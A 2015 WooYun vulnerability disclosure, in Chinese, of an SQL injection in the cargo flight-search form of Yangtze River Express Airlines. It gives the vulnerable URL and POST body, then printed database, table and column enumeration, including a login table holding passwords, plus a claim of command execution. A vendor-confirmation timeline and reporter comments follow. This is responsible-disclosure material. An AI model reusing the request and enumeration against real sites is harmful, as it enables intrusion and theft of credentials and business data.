当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114696

漏洞标题:扬子江快运航空某处POST,导致快运航班信息等等信息泄露

相关厂商:扬子江快运航空

漏洞作者: Yang

提交时间:2015-05-18 14:53

修复时间:2015-07-04 15:32

公开时间:2015-07-04 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-30: 细节向核心白帽子及相关领域专家公开
2015-06-09: 细节向普通白帽子公开
2015-06-19: 细节向实习白帽子公开
2015-07-04: 细节向公众公开

简要描述:

扬子江快运航空某处POST,导致快运航班信息等等信息泄露【PS:跑了我三天三夜】
一直在延迟
权限还挺大,可命令执行
算是第一个提交的人吧。有双飞的机会么?

详细说明:

扬子江快运航空有限公司(以下简称扬子江快运)是由海航集团全力打造的一家专业航空货运公司,主要从事国内外航空货运及物流相关业务。

http://cargo.yzr.com.cn/SearchFlight/nobooking.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTkxNjY3MDU0MQ9kFgJmD2QWAgIDD2QWAgIHD2QWAgIDD2QWAmYPZBYCAg8PPCsADQBkGAEFI2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkR3JpZFZpZXcxD2dk/pyF9JWdkGThS3nb0FfTjD4K%2B7Q%3D&ctl00$ContentPlaceHolder1$txtFno=Y8&ctl00$ContentPlaceHolder1$tbDeparture=88952634&ctl00$ContentPlaceHolder1$txtDep=88952634&ctl00$ContentPlaceHolder1$Button1=%E6%9F%A5%E8%AF%A2&ctl00$ContentPlaceHolder1$txtDest=88952634


1.png


available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
[*] YangtzeRiverDB
[*] YangtzeRiverHisDB


一直这个 跑哭了我

1.png


Database: YangtzeRiverDB
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| dbo.TBL_FSU                                        | 10417391 |
| dbo.TBL_OperationLog                               | 3876707 |
| dbo.TBL_UldLog                                     | 743874  |
| dbo.TBL_InManifest                                 | 440529  |
| dbo.TBL_HAWB                                       | 205239  |
| dbo.TBL_CUSTOMERS                                  | 169885  |
| dbo.V_FinancialAWB                                 | 116921  |
| dbo.TBL_Manifest                                   | 116589  |
| dbo.V_Manifest                                     | 116536  |
| dbo.TBL_Flight                                     | 94008   |
| dbo.TBL_ProcessData                                | 52807   |
| dbo.TBL_InManifestInfo                             | 48998   |
| dbo.TBL_HFOperation                                | 46060   |
| dbo.TBL_ContentUld                                 | 33136   |
| dbo.TBL_CBA                                        | 25502   |
| dbo.TBL_ManifestInfo                               | 7769    |
| dbo.[TBL_CPM]                                     | 2404    |
| dbo.TBL_SCMCheck                                   | 2171    |
| dbo.TBL_FunctionsGroup                             | 1310    |
| dbo.V_GETCBA                                       | 1094    |
| dbo.TBL_ChargesPort                                | 553     |
| dbo.TBL_FlightRelate                               | 426     |
| dbo.TBL_NationInfo                                 | 231     |
| dbo.TBL_CLSStatic                                  | 199     |
| dbo.TBL_ChargesWeight                              | 194     |
| dbo.TBL_OtherFee                                   | 157     |
| dbo.TBL_Function                                   | 116     |
| dbo.TBL_MessageAutoFwb                             | 74      |
| dbo.TBL_MicroRegionInfo                            | 61      |
| dbo.TBL_FunctionsGroupDesp                         | 60      |
| dbo.TBL_MessageAutoSend                            | 53      |
| dbo.TBL_CityGroup                                  | 41      |
| dbo.TBL_GoodsCode                                  | 33      |
| dbo.TBL_ReasonSet                                  | 26      |
| dbo.TBL_LimitAnalysis                              | 25      |
| dbo.TBL_ManifestULD                                | 22      |
| dbo.TBL_LDM                                        | 18      |
| dbo.TBL_AircraftStatic                             | 15      |
| dbo.TBL_UCM                                        | 14      |
| dbo.TBL_MessageTemplate                            | 7       |
| dbo.leAuditCollectDatabases                        | 6       |
| dbo.TBL_BookingRemind                              | 6       |
| dbo.leAuditCollectAlerts                           | 5       |
| dbo.TBL_FLightLimit                                | 5       |
| dbo.[V_Ielixeryq愀嘙oreConqitio~Tgktp-SE|87Q51]^] | 4       |
| dbo.[V`CBAankActIontrast]                          | 4       |
| dbo.dtproperties                                   | 4       |
| dbo.tbl_AMSErrorAlyer                              | 4       |
| dbo.TBL_ReaionInqo                                 | 4       |
| dbo.V_GoodsParticularInfo                          | 4       |
| dbo.V_IomarriveGoodsDqy                            | 4       |
| dbo.leAuditCollectConfigVars                       | 3       |
| dbo.TBL_ExchangeRate                               | 3       |
| dbo.TBL_EmailSet                                   | 2       |
| dbo.TBL_Login                                      | 2       |
| dbo.[TBL_EmailE]                                  | 1       |
| dbo.[TBL_SitaAddress!]                           | 1       |
| dbo.[TBL_SitaRecv+A]                               | 1       |
| dbo.[TBL_UldGnConfkrm]                            | 1       |
| dbo.[V_DpmArriwehooi椁哅	(]                           | 1       |
| dbo.[V_GETAGENTMANIFESTINFO]                      | 1       |
| dbo.[V_Zelive鈥唝]yKondi|娲俹n
?B
	]                   | 1       |
| dbo.flightZJDView                                  | 1       |
| dbo.leAuditCollectNotification                     | 1       |
| dbo.TBL_FeeNameB                                   | 1       |
| dbo.TBL_MailData                                   | 1       |
| dbo.V_DomGoodsBusinessMontiReport_office           | 1       |
| dbo.V_FlightTakeTheVolume                          | 1       |
| dbo.v_InFlightFee                                  | 1       |
+----------------------------------------------------+---------+


有部分表可以得出:
| dbo.TBL_FSU | 10417391 |

Table: TBL_FSU
[21 columns]
+---------------------------------------------+-------------+
| Column                                      | Type        |
+---------------------------------------------+-------------+
| BwbNumberI!!\x02F\x13                       |
| CrecteTime\r                                |
| DepartuyeTime!\x05                          |
| FDaty\x11\x03                               |
| FlikhtNo\r\x11\x03\x08AB#                   | A           |
| Name\x07\x03                                | A           |
| Ofg3\x13\x03E                               | \x05        |
| Preuix\x12)                                 | \x02        |
| StatusType\x07a%\x11                        | \x03        |
| Volume!\x02KA%\r\x0f&\x0e\x05"\x1b\x12\x03B | \t          |
| yrrjvalTjme\t\x11\x05\t                     |
| ZeigitCoie\x17J\x05I!!KB                    | !"\t!       |
| AirportCode                                 | varchar\x02 |
| Buard                                       | \x05!       |
| Iest                                        |
| ir                                          |
| Orig                                        | ihar!       |
| PiecesIAY                                   | !           |
| TPieces                                     | qnt\t       |
| VolumeIodfQB                                | A           |
| WfightU                                     | \x15\x03    |
+---------------------------------------------+-------------+
有的跑乱码了


| dbo.TBL_Flight 【飞机的意思么】 | 94008 |

Database: YangtzeRiverDB
Table: TBL_Flight
[33 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| DATOP!          |
| DestTimeA\t\x05 |
| Diff\x02        |
| Fdate\x11       |
| AcNo            | varchar     |
| Bjz             | varchar     |
| DepTime         | char        |
| Fdep            | varchar     |
| Fdest           | varchar     |
| FID             | intA        |
| FinalVersion    | smallint    |
| FLG_CS          | char        |
| FLG_DELAY       | varchar     |
| FlightType      | char        |
| Fno             | varchar     |
| IsFinish        | char        |
| IsSaleLogmc     |
| jtz             | varchar     |
| LargestPayload  | decimal     |
| Location        | varchar     |
| LONG_REG        | varchar     |
| ManifestClqse   |
| OffCheckInFlag  | char        |
| PlanDepTime     | char        |
| PlanDestTime    | char        |
| PreDepTime      | char        |
| PreDestTime     | char        |
| RealDepTime     | char        |
| RealDestTime    | char        |
| ReasonInfo      | varchqr     |
| Status          | char\x11    |
| Type            | varchar     |
| VERSION         | varchar\x03 |
+-----------------+-------------+


| dbo.TBL_InManifest | 440529 |
| dbo.TBL_Manifest | 116589 |
| dbo.V_Manifest | 116536 |
这些都是订单么?

漏洞证明:

Database: YangtzeRiverDB
Table: TBL_Login
[13 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AreaCity    | char     |
| CurrentCity | char     |
| DateEnd     | datetime |
| DateFrom    | datetime |
| Duty        | nvarchar |
| Email       | nvarchar |
| Office      | nvarchar |
| OpDate      | datetime |
| OpId        | nvarchar |
| Password    | nvarchar |
| Telephone   | nvarchar |
| UserN       | varchar  |
| UserName    | nvarchar |
+-------------+----------+


可命令执行

1.png

修复方案:

版权声明:转载请注明来源 Yang@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-20 15:31

厂商回复:

谢谢,我们会立即组织修复

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-20 15:40 | Yang ( 普通白帽子 | Rank:247 漏洞数:86 | 作为菜鸟,大米手机摔破了怎么办?)

    妈蛋,你给个高危也好呀,只得到2rank@扬子江快运航空

  2. 2015-06-13 12:30 | 几何黑店 ( 核心白帽子 | Rank:1527 漏洞数:231 | 我要低调点儿.......)

    @Yang 小厂商啊,你没注意到?

  3. 2015-06-13 12:41 | Yang ( 普通白帽子 | Rank:247 漏洞数:86 | 作为菜鸟,大米手机摔破了怎么办?)

    @几何黑店 没注意。。我基本都是小厂商。。。。没办法呀。。